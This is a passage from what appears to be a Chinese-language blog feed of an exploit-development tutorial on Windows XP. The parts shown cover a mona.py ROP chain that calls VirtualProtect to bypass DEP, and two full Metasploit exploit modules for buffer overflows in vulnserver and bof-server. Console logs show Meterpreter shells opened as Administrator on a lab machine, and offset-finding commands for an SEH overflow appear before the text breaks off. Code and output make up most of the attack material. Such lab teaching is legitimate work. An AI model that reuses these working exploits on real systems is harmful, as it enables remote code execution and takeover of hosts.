class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">################################################################################</span></span><br><span class="line"></span><br><span class="line">Register setup <span class="keyword">for</span> VirtualProtect() <span class="symbol">:</span></span><br><span class="line">--------------------------------------------</span><br><span class="line"> EAX = NOP (<span class="number">0x90909090</span>)</span><br><span class="line"> ECX = lpOldProtect (ptr to W address)</span><br><span class="line"> EDX = NewProtect (<span class="number">0x40</span>)</span><br><span class="line"> EBX = dwSize</span><br><span class="line"> ESP = lPAddress (automatic)</span><br><span class="line"> EBP = ReturnTo (ptr to jmp esp)</span><br><span class="line"> ESI = ptr to VirtualProtect()</span><br><span class="line"> EDI = ROP NOP (RETN)</span><br><span class="line"> --- alternative chain ---</span><br><span class="line"> EAX = ptr to &amp;VirtualProtect()</span><br><span class="line"> ECX = lpOldProtect (ptr to W address)</span><br><span class="line"> EDX = NewProtect (<span class="number">0x40</span>)</span><br><span class="line"> EBX = dwSize</span><br><span class="line"> ESP = lPAddress (automatic)</span><br><span class="line"> EBP = POP (skip <span class="number">4</span> bytes)</span><br><span class="line"> ESI = ptr to JMP [EAX]</span><br><span class="line"> EDI = ROP NOP (RETN)</span><br><span class="line"> + place ptr to <span class="string">"jmp esp"</span> on stack, below PUSHAD</span><br><span class="line">--------------------------------------------</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">ROP Chain <span class="keyword">for</span> VirtualProtect() [(XP/<span class="number">2003</span> Server <span class="keyword">and</span> up)] <span class="symbol">:</span></span><br><span class="line">----------------------------------------------------------</span><br><span class="line"></span><br><span class="line">*** [ Ruby ] ***</span><br><span class="line"></span><br><span class="line">  <span class="function"><span class="keyword">def</span> <span class="title">create_rop_chain</span><span class="params">()</span></span></span><br><span class="line"></span><br><span class="line">    <span class="comment"># rop chain generated with mona.py - www.corelan.be</span></span><br><span class="line">    rop_gadgets =</span><br><span class="line">    [</span><br><span class="line">      <span class="number">0x77dabf34</span>,  <span class="comment"># POP ECX # RETN [ADVAPI32.dll]</span></span><br><span class="line">      <span class="number">0x6250609c</span>,  <span class="comment"># ptr to &amp;VirtualProtect() [IAT essfunc.dll]</span></span><br><span class="line">      <span class="number">0x77d1927f</span>,  <span class="comment"># MOV EAX,DWORD PTR DS:[ECX] # RETN [USER32.dll]</span></span><br><span class="line">      <span class="number">0x7c96d192</span>,  <span class="comment"># XCHG EAX,ESI # RETN [ntdll.dll]</span></span><br><span class="line">      <span class="number">0x77bef671</span>,  <span class="comment"># POP EBP # RETN [msvcrt.dll]</span></span><br><span class="line">      <span class="number">0x625011af</span>,  <span class="comment"># &amp; jmp esp [essfunc.dll]</span></span><br><span class="line">      <span class="number">0x77e9ad22</span>,  <span class="comment"># POP EAX # RETN [RPCRT4.dll]</span></span><br><span class="line">      <span class="number">0xfffffdff</span>,  <span class="comment"># Value to negate, will become 0x00000201</span></span><br><span class="line">      <span class="number">0x77e6c784</span>,  <span class="comment"># NEG EAX # RETN [RPCRT4.dll]</span></span><br><span class="line">      <span class="number">0x77dc560a</span>,  <span class="comment"># XCHG EAX,EBX # RETN [ADVAPI32.dll]</span></span><br><span class="line">      <span class="number">0x7c87fbcb</span>,  <span class="comment"># POP EAX # RETN [kernel32.dll]</span></span><br><span class="line">      <span class="number">0xffffffc0</span>,  <span class="comment"># Value to negate, will become 0x00000040</span></span><br><span class="line">      <span class="number">0x77d4493b</span>,  <span class="comment"># NEG EAX # RETN [USER32.dll]</span></span><br><span class="line">      <span class="number">0x77c28fbc</span>,  <span class="comment"># XCHG EAX,EDX # RETN [msvcrt.dll]</span></span><br><span class="line">      <span class="number">0x77bef7c9</span>,  <span class="comment"># POP ECX # RETN [msvcrt.dll]</span></span><br><span class="line">      <span class="number">0x7c99bac1</span>,  <span class="comment"># &amp;Writable location [ntdll.dll]</span></span><br><span class="line">      <span class="number">0x719e4870</span>,  <span class="comment"># POP EDI # RETN [mswsock.dll]</span></span><br><span class="line">      <span class="number">0x77e6d224</span>,  <span class="comment"># RETN (ROP NOP) [RPCRT4.dll]</span></span><br><span class="line">      <span class="number">0x77e8c50c</span>,  <span class="comment"># POP EAX # RETN [RPCRT4.dll]</span></span><br><span class="line">      <span class="number">0x90909090</span>,  <span class="comment"># nop</span></span><br><span class="line">      <span class="number">0x77de60c7</span>,  <span class="comment"># PUSHAD # RETN [ADVAPI32.dll]</span></span><br><span class="line">    ].flatten.pack(<span class="string">"V*"</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> rop_gadgets</span><br><span class="line"></span><br><span class="line">  <span class="keyword">end</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">  <span class="comment"># Call the ROP chain generator inside the 'exploit' function :</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">  rop_chain = create_rop_chain()</span><br></pre></td></tr></table></figure></p><h2 id="自动化攻击-2"><a href="#自动化攻击-2" class="headerlink" title="自动化攻击"></a>自动化攻击</h2><figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">require</span> <span class="string">'msf/core'</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Metasploit3</span> &lt; Msf::Exploit::<span class="title">Remote</span></span></span><br><span class="line">  Rank = NormalRanking</span><br><span class="line">  <span class="keyword">include</span> Msf::Exploit::Remote::Tcp</span><br><span class="line"></span><br><span class="line">  <span class="function"><span class="keyword">def</span> <span class="title">initialize</span><span class="params">(info = &#123;&#125;)</span></span></span><br><span class="line">    <span class="keyword">super</span>(update_info(info,</span><br><span class="line">      <span class="string">'Name'</span>           =&gt; <span class="string">'DEP Bypass Exploit'</span>,</span><br><span class="line">      <span class="string">'Description'</span>    =&gt; <span class="string">%q&#123;</span></span><br><span class="line"><span class="string">          DEP Bypass Using ROP Chains Example Module</span></span><br><span class="line"><span class="string">        &#125;</span>,</span><br><span class="line">      <span class="string">'Platform'</span>       =&gt; <span class="string">'Windows'</span>,</span><br><span class="line">      <span class="string">'Author'</span>         =&gt; <span class="string">'yanhan'</span>,</span><br><span class="line">      <span class="string">'Payload'</span>        =&gt;</span><br><span class="line">          &#123;</span><br><span class="line">            <span class="string">'space'</span>     =&gt; <span class="number">312</span>,</span><br><span class="line">            <span class="string">'BadChars'</span>  =&gt; <span class="string">"\x00"</span></span><br><span class="line">          &#125;,</span><br><span class="line">      <span class="string">'Targets'</span>        =&gt;</span><br><span class="line">          [</span><br><span class="line">              [</span><br><span class="line">    <span class="string">'Windows XP'</span>,</span><br><span class="line">    &#123;<span class="string">'Offset'</span>  =&gt; find it&#125;</span><br><span class="line">    ]</span><br><span class="line">          ],</span><br><span class="line">      <span class="string">'DisclosureDate'</span> =&gt; <span class="string">'2019-01-16'</span>))</span><br><span class="line">  <span class="keyword">end</span></span><br><span class="line"></span><br><span class="line">  <span class="function"><span class="keyword">def</span> <span class="title">create_rop_chain</span><span class="params">()</span></span></span><br><span class="line"></span><br><span class="line">    <span class="comment"># rop chain generated with mona.py - www.corelan.be</span></span><br><span class="line">    rop_gadgets =</span><br><span class="line">    [</span><br><span class="line">      <span class="number">0x77dabf34</span>,  <span class="comment"># POP ECX # RETN [ADVAPI32.dll]</span></span><br><span class="line">      <span class="number">0x6250609c</span>,  <span class="comment"># ptr to &amp;VirtualProtect() [IAT essfunc.dll]</span></span><br><span class="line">      <span class="number">0x77d1927f</span>,  <span class="comment"># MOV EAX,DWORD PTR DS:[ECX] # RETN [USER32.dll]</span></span><br><span class="line">      <span class="number">0x7c96d192</span>,  <span class="comment"># XCHG EAX,ESI # RETN [ntdll.dll]</span></span><br><span class="line">      <span class="number">0x77bef671</span>,  <span class="comment"># POP EBP # RETN [msvcrt.dll]</span></span><br><span class="line">      <span class="number">0x625011af</span>,  <span class="comment"># &amp; jmp esp [essfunc.dll]</span></span><br><span class="line">      <span class="number">0x77e9ad22</span>,  <span class="comment"># POP EAX # RETN [RPCRT4.dll]</span></span><br><span class="line">      <span class="number">0xfffffdff</span>,  <span class="comment"># Value to negate, will become 0x00000201</span></span><br><span class="line">      <span class="number">0x77e6c784</span>,  <span class="comment"># NEG EAX # RETN [RPCRT4.dll]</span></span><br><span class="line">      <span class="number">0x77dc560a</span>,  <span class="comment"># XCHG EAX,EBX # RETN [ADVAPI32.dll]</span></span><br><span class="line">      <span class="number">0x7c87fbcb</span>,  <span class="comment"># POP EAX # RETN [kernel32.dll]</span></span><br><span class="line">      <span class="number">0xffffffc0</span>,  <span class="comment"># Value to negate, will become 0x00000040</span></span><br><span class="line">      <span class="number">0x77d4493b</span>,  <span class="comment"># NEG EAX # RETN [USER32.dll]</span></span><br><span class="line">      <span class="number">0x77c28fbc</span>,  <span class="comment"># XCHG EAX,EDX # RETN [msvcrt.dll]</span></span><br><span class="line">      <span class="number">0x77bef7c9</span>,  <span class="comment"># POP ECX # RETN [msvcrt.dll]</span></span><br><span class="line">      <span class="number">0x7c99bac1</span>,  <span class="comment"># &amp;Writable location [ntdll.dll]</span></span><br><span class="line">      <span class="number">0x719e4870</span>,  <span class="comment"># POP EDI # RETN [mswsock.dll]</span></span><br><span class="line">      <span class="number">0x77e6d224</span>,  <span class="comment"># RETN (ROP NOP) [RPCRT4.dll]</span></span><br><span class="line">      <span class="number">0x77e8c50c</span>,  <span class="comment"># POP EAX # RETN [RPCRT4.dll]</span></span><br><span class="line">      <span class="number">0x90909090</span>,  <span class="comment"># nop</span></span><br><span class="line">      <span class="number">0x77de60c7</span>,  <span class="comment"># PUSHAD # RETN [ADVAPI32.dll]</span></span><br><span class="line">    ].flatten.pack(<span class="string">"V*"</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> rop_gadgets</span><br><span class="line">  <span class="keyword">end</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">  <span class="function"><span class="keyword">def</span> <span class="title">exploit</span></span></span><br><span class="line">    connect</span><br><span class="line">    rop_chain = create_rop_chain()</span><br><span class="line">    junk = make_nops(target[<span class="string">'Offset'</span>])</span><br><span class="line">    buf = <span class="string">"TRUN ."</span> + junk + rop_chain + make_nops(<span class="number">16</span>) + payload.encoded + <span class="string">'\r\n'</span></span><br><span class="line">    sock.put(buf)</span><br><span class="line">    handler</span><br><span class="line">    disconnect</span><br><span class="line">  <span class="keyword">end</span></span><br><span class="line"><span class="keyword">end</span></span><br></pre></td></tr></table></figure><figure class="highlight gams"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">msf5 &gt; use exploit/windows/yanhan/rop_attack</span><br><span class="line">msf5 exploit(windows/yanhan/rop_attack) &gt; <span class="keyword">set</span> rhosts <span class="comment">192.168.31.114</span></span><br><span class="line">rhosts <span class="comment">=&gt; 192.168.31.114</span></span><br><span class="line">msf5 <span class="comment">exploit(windows</span>/yanhan/<span class="comment">rop_attack) &gt; set rport 1000</span></span><br><span class="line">rport <span class="comment">=&gt; 1000</span></span><br><span class="line">msf5 <span class="comment">exploit(windows</span>/yanhan/<span class="comment">rop_attack) &gt; exploit</span></span><br><span class="line"></span><br><span class="line">[*] Started <span class="comment">reverse TCP handler on 192.168.31.84:4444</span></span><br><span class="line">[*] Exploit <span class="comment">completed, but no session was created.</span></span><br><span class="line">msf5 <span class="comment">exploit(windows</span>/yanhan/<span class="comment">rop_attack) &gt; set payload windows</span>/meterpreter/<span class="comment">bind_tcp</span></span><br><span class="line">payload <span class="comment">=&gt; windows</span>/meterpreter/<span class="comment">bind_tcp</span></span><br><span class="line">msf5 <span class="comment">exploit(windows</span>/yanhan/<span class="comment">rop_attack) &gt; exploit</span></span><br><span class="line"></span><br><span class="line">[*] Started <span class="comment">bind TCP handler against 192.168.31.114:4444</span></span><br><span class="line">[*] Exploit <span class="comment">completed, but no session was created.</span></span><br><span class="line">msf5 <span class="comment">exploit(windows</span>/yanhan/<span class="comment">rop_attack) &gt; exploit</span></span><br><span class="line"></span><br><span class="line">[*] Started <span class="comment">bind TCP handler against 192.168.31.114:4444</span></span><br><span class="line">[*] Sending <span class="comment">stage (179779 bytes) to 192.168.31.114</span></span><br><span class="line">[*] Meterpreter <span class="comment">session 1 opened (192.168.31.84:44537 -&gt; 192.168.31.114:4444) at 2019-07-10 16:51:07 +0800</span></span><br><span class="line"></span><br><span class="line">meterpreter <span class="comment">&gt; getuid</span></span><br><span class="line">Server <span class="comment">username: WHU-3E3EECEBFD1\Administrator</span></span><br></pre></td></tr></table></figure>]]></content>
+        <content type="html"><![CDATA[<p>这部分是对Window x86平台下的几个典型漏洞利用方式的介绍，从最基础的、没有开启任何保护的漏洞程序入手，然后开启GS，最后通过rop绕过DEP。</p><hr><h1 id="0x00-漏洞利用开发简介"><a href="#0x00-漏洞利用开发简介" class="headerlink" title="0x00 漏洞利用开发简介"></a>0x00 漏洞利用开发简介</h1><p>（1）需要什么</p><ul><li>Immunity Debugger -<a href="http://debugger.immunityinc.com/ID_register.py" target="_blank" rel="noopener">Download</a></li><li>Mona.py -<a href="https://github.com/corelan/mona" target="_blank" rel="noopener">Download</a></li><li>Metasploit框架-<a href="https://www.metasploit.com/" target="_blank" rel="noopener">下载</a></li><li>靶机–Windows XP sp3</li></ul><p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562741903/%E6%8D%95%E8%8E%B7.png" alt></p><ul><li>函数调用与栈：调用、返回</li><li>寄存器与函数栈帧：ESP、EBP</li><li>函数栈帧：局部变量、栈帧状态值、函数返回地址</li><li>函数调用约定与相关指令：参数传递方式、参数入栈顺序、恢复堆栈平衡的操作</li></ul><p>（2）函数调用的汇编过程</p><ol><li><p>示例程序</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">charname[] = <span class="string">"1234567"</span>;</span><br><span class="line">voidfunc(<span class="keyword">int</span> a, <span class="keyword">int</span> b, <span class="keyword">int</span> c)</span><br><span class="line">&#123;</span><br><span class="line">    charbuf[<span class="number">8</span>];</span><br><span class="line">    <span class="built_in">strcpy</span>(buf, name);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>汇编过程</p></li></ol><ul><li>PUSH c, PUSH b, PUSH a</li><li>CALL address of func【保存返回地址；跳转】</li><li>MOV ebp, esp</li><li>PUSH ebp</li><li>SUB esp, 0x40</li><li>创建局部变量，4个字节为一组</li><li>do something</li><li>add esp, 0x40</li><li>pop ebp</li><li>RETN【弹出返回地址，跳转】</li></ul><ol start="3"><li>栈帧结构<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742079/%E6%8D%95%E8%8E%B71.png" alt></li></ol><h1 id="0x01-简单栈溢出"><a href="#0x01-简单栈溢出" class="headerlink" title="0x01 简单栈溢出"></a>0x01 简单栈溢出</h1><blockquote><p><strong>目标程序:</strong><br><a href="http://redstack.net/blog/static/uploads/2008/01/bof-server.c" target="_blank" rel="noopener">bof-server source code</a><br><a href="http://redstack.net/blog/wp-content/uploads/2008/01/bof-server.exe" target="_blank" rel="noopener">bof-server binary for Windows</a><br><strong>usage:</strong><br>服务端<br><code>bof-server.exe 4242</code><br>客户端<br><code>telnet localhost 4242</code><br><code>version</code><br><code>bof-server v0.01</code><br><code>quit</code></p></blockquote><h2 id="漏洞点"><a href="#漏洞点" class="headerlink" title="漏洞点"></a>漏洞点</h2><p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742316/%E5%9B%BE%E7%89%871.png" alt></p><p><strong>产生崩溃</strong><br>将输出的1024个A发送给靶机程序<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">python -c &quot;print(&apos;A&apos; * 1024)&quot;</span><br><span class="line">telnet 192.168.64.138 4242</span><br></pre></td></tr></table></figure></p><p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742366/%E5%9B%BE%E7%89%872.png" alt></p><h2 id="关闭防御措施"><a href="#关闭防御措施" class="headerlink" title="关闭防御措施"></a>关闭防御措施</h2><p>使用<strong>PESecurity</strong>检查可执行文件本身的防御措施开启情况<br>注意设置：Set-ExecutionPolicyUnrestricted</p><p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742444/%E5%9B%BE%E7%89%873.png" alt></p><p><strong>ASLR和DEP</strong><br>ASLR在xp下不用考虑，DEP可通过修改boot.ini中的nonexecute来完成（AlwaysOff、OptOut）<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742486/%E5%9B%BE%E7%89%874.png" alt></p><h2 id="整体的攻击流程"><a href="#整体的攻击流程" class="headerlink" title="整体的攻击流程"></a>整体的攻击流程</h2><ol><li>任意非00的指令覆盖buffer和EBP</li><li>从程序已经加载的dll中获取他们的jmp esp指令地址。</li><li>使用jmp esp的指令地址覆盖ReturnAddress</li><li>从下一行开始填充Shellcode<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742543/%E5%9B%BE%E7%89%875.png" alt></li></ol><h2 id="确定溢出点的位置"><a href="#确定溢出点的位置" class="headerlink" title="确定溢出点的位置"></a>确定溢出点的位置</h2><ol><li><p>生成字符序列 <strong>pattern_create.rb</strong><br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742622/%E5%9B%BE%E7%89%876.png" alt></p></li><li><p>发送给目标程序<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742623/%E5%9B%BE%E7%89%877.png" alt></p></li><li><p>计算偏移量 <strong>pattern_offset.rb</strong><br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742685/%E5%9B%BE%E7%89%878.png" alt></p></li><li><p>确定payload结构<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742686/%E5%9B%BE%E7%89%879.png" alt></p></li></ol><h2 id="寻找jmp-esp跳板"><a href="#寻找jmp-esp跳板" class="headerlink" title="寻找jmp esp跳板"></a>寻找jmp esp跳板</h2><ol><li>OD附加进程看一下服务器加载了哪些模块<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742794/%E5%9B%BE%E7%89%8710.png" alt></li><li>查找JMP ESP指令的地址<br>在这里选择了ws2_32.dll作为对象，通过Metasploit的msfbinscan进行搜索<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742793/%E5%9B%BE%E7%89%8711.png" alt></li></ol><h2 id="自动化攻击"><a href="#自动化攻击" class="headerlink" title="自动化攻击"></a>自动化攻击</h2><figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">require</span> <span class="string">'msf/core'</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Metasploit3</span> &lt; Msf::Exploit::<span class="title">Remote</span></span></span><br><span class="line">  Rank = NormalRanking</span><br><span class="line">  <span class="keyword">include</span> Msf::Exploit::Remote::Tcp</span><br><span class="line"></span><br><span class="line">  <span class="function"><span class="keyword">def</span> <span class="title">initialize</span><span class="params">(info = &#123;&#125;)</span></span></span><br><span class="line">  <span class="keyword">super</span>(update_info(info,</span><br><span class="line">    <span class="string">'Name'</span> =&gt; <span class="string">'Stack Based Buffer Overflow Example'</span>,</span><br><span class="line">    <span class="string">'Description'</span> =&gt; <span class="string">%q&#123;</span></span><br><span class="line"><span class="string">          Stack Based Overflow Example Application Exploitation Module</span></span><br><span class="line"><span class="string">       &#125;</span>,</span><br><span class="line">    <span class="string">'Platform'</span> =&gt; <span class="string">'Windows'</span>,</span><br><span class="line">    <span class="string">'Author'</span> =&gt; <span class="string">'yanhan'</span>,</span><br><span class="line"></span><br><span class="line">    <span class="string">'Payload'</span> =&gt;</span><br><span class="line">         &#123;</span><br><span class="line">           <span class="string">'space'</span> =&gt; <span class="number">400</span>,</span><br><span class="line">                           <span class="string">'BadChars'</span> =&gt; <span class="string">"\x00\xff"</span></span><br><span class="line">                         &#125;,</span><br><span class="line">    <span class="string">'Targets'</span>  =&gt;</span><br><span class="line">         [</span><br><span class="line">             [</span><br><span class="line">      <span class="string">'Windows XP SP3'</span>,</span><br><span class="line">      &#123;<span class="string">'Ret'</span> =&gt; <span class="number">0x71a22b53</span>, <span class="string">'Offset'</span> =&gt; <span class="number">520</span>&#125;</span><br><span class="line">     ]</span><br><span class="line">         ],</span><br><span class="line">     <span class="string">'DisclosureDate'</span> =&gt; <span class="string">'2019-05-25'</span></span><br><span class="line">  ))</span><br><span class="line">  <span class="keyword">end</span></span><br><span class="line"></span><br><span class="line">  <span class="function"><span class="keyword">def</span> <span class="title">exploit</span></span></span><br><span class="line">    connect</span><br><span class="line">    buf = make_nops(target[<span class="string">'Offset'</span>])</span><br><span class="line">    buf = buf + [target[<span class="string">'Ret'</span>]].pack(<span class="string">'V'</span>) + make_nops(<span class="number">20</span>) + payload.encoded</span><br><span class="line">    sock.put(buf)</span><br><span class="line">    handler</span><br><span class="line">    disconnect</span><br><span class="line">   <span class="keyword">end</span></span><br><span class="line"><span class="keyword">end</span></span><br></pre></td></tr></table></figure><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line">msf5 &gt; use exploit/windows/yanhan/bof_attack</span><br><span class="line">msf5 exploit(windows/yanhan/bof_attack) &gt; set rhosts 192.168.31.114</span><br><span class="line">rhosts =&gt; 192.168.31.114</span><br><span class="line">msf5 exploit(windows/yanhan/bof_attack) &gt; set rport 1000</span><br><span class="line">rport =&gt; 1000</span><br><span class="line">msf5 exploit(windows/yanhan/bof_attack) &gt; exploit</span><br><span class="line"></span><br><span class="line">[*] Started reverse TCP handler on 192.168.31.84:4444</span><br><span class="line">[*] Sending stage (179779 bytes) to 192.168.31.114</span><br><span class="line">[*] Meterpreter session 1 opened (192.168.31.84:4444 -&gt; 192.168.31.114:1062) at 2019-07-10 16:38:51 +0800</span><br><span class="line"></span><br><span class="line">meterpreter &gt; ls</span><br><span class="line">Listing: C:\Documents and Settings\Administrator</span><br><span class="line">================================================</span><br><span class="line"></span><br><span class="line">Mode              Size     Type  Last modified              Name</span><br><span class="line">----              ----     ----  -------------              ----</span><br><span class="line">40555/r-xr-xr-x   0        dir   2019-05-14 09:54:43 +0800  Application Data</span><br><span class="line">40777/rwxrwxrwx   0        dir   2019-05-14 09:54:43 +0800  Cookies</span><br><span class="line">40555/r-xr-xr-x   0        dir   2019-05-14 09:54:43 +0800  Favorites</span><br><span class="line">40777/rwxrwxrwx   0        dir   2019-05-14 09:54:43 +0800  Local Settings</span><br><span class="line">40555/r-xr-xr-x   0        dir   2019-05-14 09:54:43 +0800  My Documents</span><br><span class="line">100666/rw-rw-rw-  1048576  fil   2019-05-14 09:54:43 +0800  NTUSER.DAT</span><br><span class="line">40777/rwxrwxrwx   0        dir   2019-05-14 09:54:43 +0800  NetHood</span><br><span class="line">40777/rwxrwxrwx   0        dir   2019-05-14 09:54:43 +0800  PrintHood</span><br><span class="line">40555/r-xr-xr-x   0        dir   2019-05-14 09:54:43 +0800  Recent</span><br><span class="line">40555/r-xr-xr-x   0        dir   2019-05-14 09:54:43 +0800  SendTo</span><br><span class="line">40777/rwxrwxrwx   0        dir   2019-05-14 09:54:43 +0800  Templates</span><br><span class="line">100777/rwxrwxrwx  26665    fil   2019-05-28 14:59:10 +0800  bof-server.exe</span><br><span class="line">100666/rw-rw-rw-  1024     fil   2019-05-14 09:54:43 +0800  ntuser.dat.LOG</span><br><span class="line">100666/rw-rw-rw-  178      fil   2019-05-14 09:54:43 +0800  ntuser.ini</span><br><span class="line">40777/rwxrwxrwx   0        dir   2019-05-29 10:49:26 +0800  vulnserver</span><br><span class="line">40555/r-xr-xr-x   0        dir   2019-05-14 09:54:43 +0800  「开始」菜单</span><br><span class="line">40777/rwxrwxrwx   0        dir   2019-05-14 09:54:43 +0800  桌面</span><br><span class="line"></span><br><span class="line">meterpreter &gt;</span><br></pre></td></tr></table></figure><hr><h1 id="0x02-基于SEH的栈溢出"><a href="#0x02-基于SEH的栈溢出" class="headerlink" title="0x02 基于SEH的栈溢出"></a>0x02 基于SEH的栈溢出</h1><blockquote><p><strong>目标程序</strong> Easy File Sharing Web Server 7.2</p><p><strong>漏洞点</strong><br>在处理请求时存在漏洞——一个恶意的请求头部（HEAD或GET）就可以引起缓冲区溢出，从而改写SEH链的地址。</p><p><strong>利用seh</strong><br>填充物+nseh+ seh（pop popretn指令序列地址）+shellcode</p><p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744120/11.png" alt></p></blockquote><h2 id="确定溢出点的位置-1"><a href="#确定溢出点的位置-1" class="headerlink" title="确定溢出点的位置"></a>确定溢出点的位置</h2><ol><li>生成字符序列<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">/opt/metasploit-framework/embedded/framework/tools/exploit/pattern_create.rb -l 10000 &gt; a.txt</span><br><span class="line">python -c &quot;print(&apos; HTTP/1.0\r\n\r\n&apos;)&quot; &gt; b.txt</span><br><span class="line">cat a.txt b.txt &gt; c.txt</span><br></pre></td></tr></table></figure></li></ol><p>删除cat造成的多余字符0x0a<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">vim -bz.txt</span><br><span class="line"># In Vim</span><br><span class="line">:%!xxd</span><br><span class="line"># After editing, use the instruction below to save</span><br><span class="line">:%!xxd 